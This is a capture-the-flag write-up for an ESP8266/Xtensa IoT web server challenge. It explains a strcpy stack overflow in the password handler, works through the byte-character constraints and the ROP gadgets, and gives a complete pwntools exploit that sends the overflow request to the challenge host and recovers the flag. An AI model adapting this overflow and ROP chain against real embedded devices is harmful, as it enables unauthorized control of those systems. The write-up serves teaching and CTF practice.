We are given the source code of an IoT device, a "redacted" compiled binary, and a site that is supposedly related to the device.
The "redacted" binary keeps the values of `WEBSITE_HTML`, `PASSWORD` (which is "thatturnsmeon", by the way) and `ssid` ("wpictfpinet"),
but the flag is replaced by "WPI{XXXXXXXXXXXXXXXXXX}". The content of the site matches `WEBSITE_HTML`,
but the HTTP headers reveal nginx acting as a proxy.
The site links to a YouTube stream [https://www.youtube.com/embed/99aCwPd_DB8](https://www.youtube.com/embed/99aCwPd_DB8) that supposedly
shows the device itself, which is fun but not really useful for the solution.

The vulnerability is in `handle_request()`: for `http://<site>/check_password?password=XXX`
it `strcpy`-s `XXX` into a fixed-size buffer `char password[32]`.
`XXX` is extracted by a series of `strtok()` calls, which means that some characters are forbidden:
no null bytes (`handle_request()` operates on C strings), no '\n', '\r' or space (HTTP request syntax),
and no '?' or '='. We also have a convenient function `send_flag()` that, unsurprisingly, sends the flag
to the client identified by its only parameter. It is supposed to produce a separate response,
but the code does not set a Content-Length header, so if we manage to direct the control flow to `send_flag()`
after `handle_request()` has finished, the second response will be interpreted as a continuation of the first one,
and we will see the flag. `send_flag()` is never called directly, but its address is referenced in the binary.
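
The character restrictions above can be captured in a small helper that is handy while assembling a payload. This is only a sketch: the set of forbidden bytes is taken from the description above, and the names `FORBIDDEN`, `forbidden_bytes` and `is_safe` are made up for illustration.

```python
# Bytes that cannot survive the request parsing described above:
# NUL ends the C string, CR/LF/space belong to the HTTP request syntax,
# and '?' / '=' are consumed by the strtok() calls around the password value.
FORBIDDEN = b"\x00\r\n ?="

def forbidden_bytes(payload: bytes) -> list:
    """Return the sorted distinct forbidden byte values found in payload."""
    return sorted(set(payload) & set(FORBIDDEN))

def is_safe(payload: bytes) -> bool:
    """True if the payload can be placed in the password parameter unchanged."""
    return not forbidden_bytes(payload)
```

For example, `is_safe(b"A" * 32)` holds, while any payload containing the byte 0x20 is rejected.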

Now it's time to investigate the compiled binary more closely. `file challenge.ino.elf_redacted` says
`ELF 32-bit LSB executable, Tensilica Xtensa, version 1 (SYSV), statically linked, with debug_info, not stripped`.
Xtensa isn't exactly the most-studied architecture, but [https://github.com/BlackVS/ESP32-reversing](https://github.com/BlackVS/ESP32-reversing) has some useful links,
including the instruction set reference and an IDA processor plugin. So we don't need to decode bits manually, but there is still
no automatic ROP gadget finder or anything of the kind.

The vulnerable part in the disassembly:

    .irom0.text:40201DE7     call0   strtok
    .irom0.text:40201DEA     mov.n   a3, a2
    .irom0.text:40201DEC     beqz    a2, loc_40201D42
    .irom0.text:40201DEF     mov.n   a2, a1
    .irom0.text:40201DF1     call0   strcpy
    .irom0.text:40201DF4     movi.n  a2, 0
    .irom0.text:40201DF6     s8i     a2, a1, 0x1F
    .irom0.text:40201DF9     mov.n   a2, a1
    .irom0.text:40201DFB     call0   _Z14check_passwordPc ; check_password(char *)
    .irom0.text:40201DFE     mov.n   a3, a2
    .irom0.text:40201E00     mov.n   a2, a13
    .irom0.text:40201E02     j       loc_40201E18
    .irom0.text:40201E18 loc_40201E18:           ; CODE XREF: handle_request(WiFiClient &,char *)+DA↑j
    .irom0.text:40201E18     call0   _Z21send_message_responseR10WiFiClientPc ; send_message_response(WiFiClient &,char *)
    .irom0.text:40201E1B     j       loc_40201E2C
    .irom0.text:40201E2C loc_40201E2C:           ; CODE XREF: handle_request(WiFiClient &,char *)+81↑j
    .irom0.text:40201E2C                         ; handle_request(WiFiClient &,char *)+F3↑j
    .irom0.text:40201E2C     l32i.n  a0, a1, 0x2C
    .irom0.text:40201E2E     l32i.n  a12, a1, 0x28
    .irom0.text:40201E30     l32i.n  a13, a1, 0x24
    .irom0.text:40201E32     l32i.n  a14, a1, 0x20
    .irom0.text:40201E34     addi    a1, a1, 0x30
    .irom0.text:40201E37     ret.n

The `.n` suffix stands for "narrow" (2-byte vs 3-byte encoding) and can apparently be ignored while reverse-engineering.
`a1` is the stack pointer, `ret` jumps to `a0`, and `a2` holds the first argument on function entry
and the return value on exit. During `handle_request()`, `password` (the only local variable) is at the top of the stack,
followed by the saved values of `a14` (`[a1+0x20]`), `a13` (`[a1+0x24]`), `a12` (`[a1+0x28]`) and the return address (`[a1+0x2C]`).
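
The frame layout just described can be written down as a small builder, which makes the overwrite order explicit. This is a sketch based on the offsets in the disassembly; `build_frame` and the register values used in the example are placeholders, not part of the challenge.

```python
import struct

BUF_SIZE = 0x20  # char password[32] occupies [a1+0x00 .. a1+0x1F]

def build_frame(a14: int, a13: int, a12: int, a0: int, fill: bytes = b"A") -> bytes:
    """Bytes that fill password[] and then overwrite the saved registers.

    The order follows the stack layout: a14 at +0x20, a13 at +0x24,
    a12 at +0x28 and the return address a0 at +0x2C, all little-endian.
    """
    return fill * BUF_SIZE + struct.pack("<4I", a14, a13, a12, a0)

# Placeholder values, chosen only to make each slot easy to spot.
frame = build_frame(0x11111111, 0x22222222, 0x33333333, 0x44444444)
assert len(frame) == 0x30
assert frame[0x2C:0x30] == struct.pack("<I", 0x44444444)
```

Anything appended after these 0x30 bytes lands in the caller's frame, which is what the rest of the exploit relies on.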

Note: it seems that Xtensa supports a feature like [https://en.wikipedia.org/wiki/Register_window](https://en.wikipedia.org/wiki/Register_window), where functions have no explicit save/load instructions
at entry and exit; instead, save/load occurs in bulk when the corresponding buffer overflows.
Searching the net for "xtensa pwn" will likely lead to discussions about how to defeat this feature;
however, it is disabled here, so there is no need to worry about it.

So we want to call `send_flag()` at 0x40201A90 with `a2` set to the address of `client`. `handle_request()`
receives this address in `a2`, but that value is long gone by the point where we can change the control flow. The caller `handle_connection()`
keeps it in `a12`, which our buffer overflow overwrites and which we cannot read. So we have to obtain it as the stack address
of a local variable inside `loop()`: after the return from `handle_request()` it will be at `a1+0x30` (`handle_connection()` uses
0x30 bytes of stack space). Also, 0x40201A90 interpreted as a byte sequence contains a space (0x20),
so we cannot use this address in our payload directly. Actually, the same holds for any 0x4020xxxx address, so a large part
of the code is excluded from possible ROP gadgets.
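
The remark about the space byte is easy to verify by packing the addresses as little-endian 32-bit values. A minimal sketch using only the standard library; `le32` and `has_space` are illustrative helper names.

```python
import struct

def le32(value: int) -> bytes:
    """Pack a 32-bit value the way it is laid out in little-endian memory."""
    return struct.pack("<I", value)

def has_space(addr: int) -> bool:
    """True if the packed address contains the byte 0x20 (ASCII space)."""
    return b" " in le32(addr)

SEND_FLAG = 0x40201A90
assert le32(SEND_FLAG) == b"\x90\x1a\x20\x40"
assert has_space(SEND_FLAG)
# Every address of the form 0x4020xxxx has 0x20 as its third byte.
assert all(has_space(0x40200000 | low) for low in (0x0000, 0x1EF8, 0xFFFF))
# Addresses in 0x4022xxxx, such as 0x40221CCC, do not have this problem.
assert not has_space(0x40221CCC)
```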

ROP gadgets can be of two types: those ending with `ret` and those ending with an indirect call/jump.
It is easy to find a gadget of the first type that adjusts the stack by a given amount and possibly
restores the non-volatile registers `a12..a15` with constant values from the payload; however, obtaining a stack address
this way seems unlikely (returning the address of a local variable is almost always a bug). Searching for the indirect call instruction `callx0`,
after a while we can find the following gadget:

    .irom0.text:40221CCC     l32r    a5, off_40221C04 ; .int unk_3FFEE7E0
    .irom0.text:40221CCF     addx4   a5, a13, a5
    .irom0.text:40221CD2     l32i.n  a5, a5, 0
    .irom0.text:40221CD4     beqz.n  a5, loc_40221CE5
    .irom0.text:40221CD6     mov.n   a3, a14
    .irom0.text:40221CD8     l8ui    a4, a14, 1
    .irom0.text:40221CDB     mov.n   a2, a1
    .irom0.text:40221CDD     addi.n  a4, a4, 2
    .irom0.text:40221CDF     extui   a4, a4, 0, 8
    .irom0.text:40221CE2     callx0  a5

This gadget fetches a function address from `[0x3FFEE7E0+a13*4]` into `a5` and calls it with `a2 = a1` (plus some manipulations
of `a3` and `a4` that are not important for us, except that `a14` must be a readable address). This solves both problems:
how to load a stack address into `a2`, and how to encode the address of `send_flag()` in the payload without spaces. The dword at 0x40201EF8
(referenced from `setup()`) contains 0x40201A90, so it is sufficient to make `0x3FFEE7E0+a13*4 == 0x40201EF8`. Arithmetically
this means 0x84DC6 for `a13`, but we must avoid zero bytes, so we'll use 0x80084DC6 instead: multiplying by 4 shifts the extra top bit
out of the 32-bit result. It remains to adjust the stack with another gadget:

    from pwn import *

    context.log_level = 'debug'
    HOST = 'iot105fja983j.wpictf.xyz'

    payload = (b'A' * 32             # fills password[32]
               + p32(0x44444444)     # a14
               + p32(0x80084DC6)     # a13: 0x3FFEE7E0 + a13*4 wraps around to 0x40201EF8
               + p32(0x45454545)     # a12
               + p32(0x40221CEF)     # a0: l32i a0,a1,0xC / addi a1,a1,0x30 / ret.n
               + b'B' * 0xC          # padding up to [a1+0xC], which the gadget above loads into a0
               + p32(0x40221CCC))    # next a0: the callx0 gadget
    # none of the bytes rejected by the request parsing may occur in the payload
    for bad in b' ?=\0\n\r':
        assert bad not in payload

    r = remote(HOST, 80)
    r.send(b'GET /check_password?password=' + payload + b' HTTP/1.1\r\nHost: ' + HOST.encode() + b'\r\nConnection: close\r\n\r\n')
    # read until the server closes the connection; the flag follows the first response
    print(r.recvall())

and take the flag `WPI{iotisbaddontuseiot}` from the output.
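
The choice of 0x80084DC6 for `a13` can be double-checked with a few lines of arithmetic. The sketch below models `addx4` as "shift left by 2, add, truncate to 32 bits", which matches how the gadget is used above; `addx4`, `TABLE` and `TARGET` are names introduced here for illustration.

```python
import struct

MASK32 = 0xFFFFFFFF
TABLE = 0x3FFEE7E0   # base address loaded by l32r in the gadget
TARGET = 0x40201EF8  # dword that holds the address of send_flag()

def addx4(index: int, base: int) -> int:
    """Model of addx4: (index << 2) + base, truncated to 32 bits."""
    return ((index << 2) + base) & MASK32

index = (TARGET - TABLE) // 4
assert index == 0x84DC6
assert b"\x00" in struct.pack("<I", index)       # unusable: contains a zero byte

padded = index | 0x80000000                      # set a bit that the shift discards
assert padded == 0x80084DC6
assert addx4(padded, TABLE) == TARGET            # same effective address
assert b"\x00" not in struct.pack("<I", padded)  # safe to place in the payload
```

Setting bit 30 instead of bit 31 would work equally well for the address computation, since both bits are shifted out.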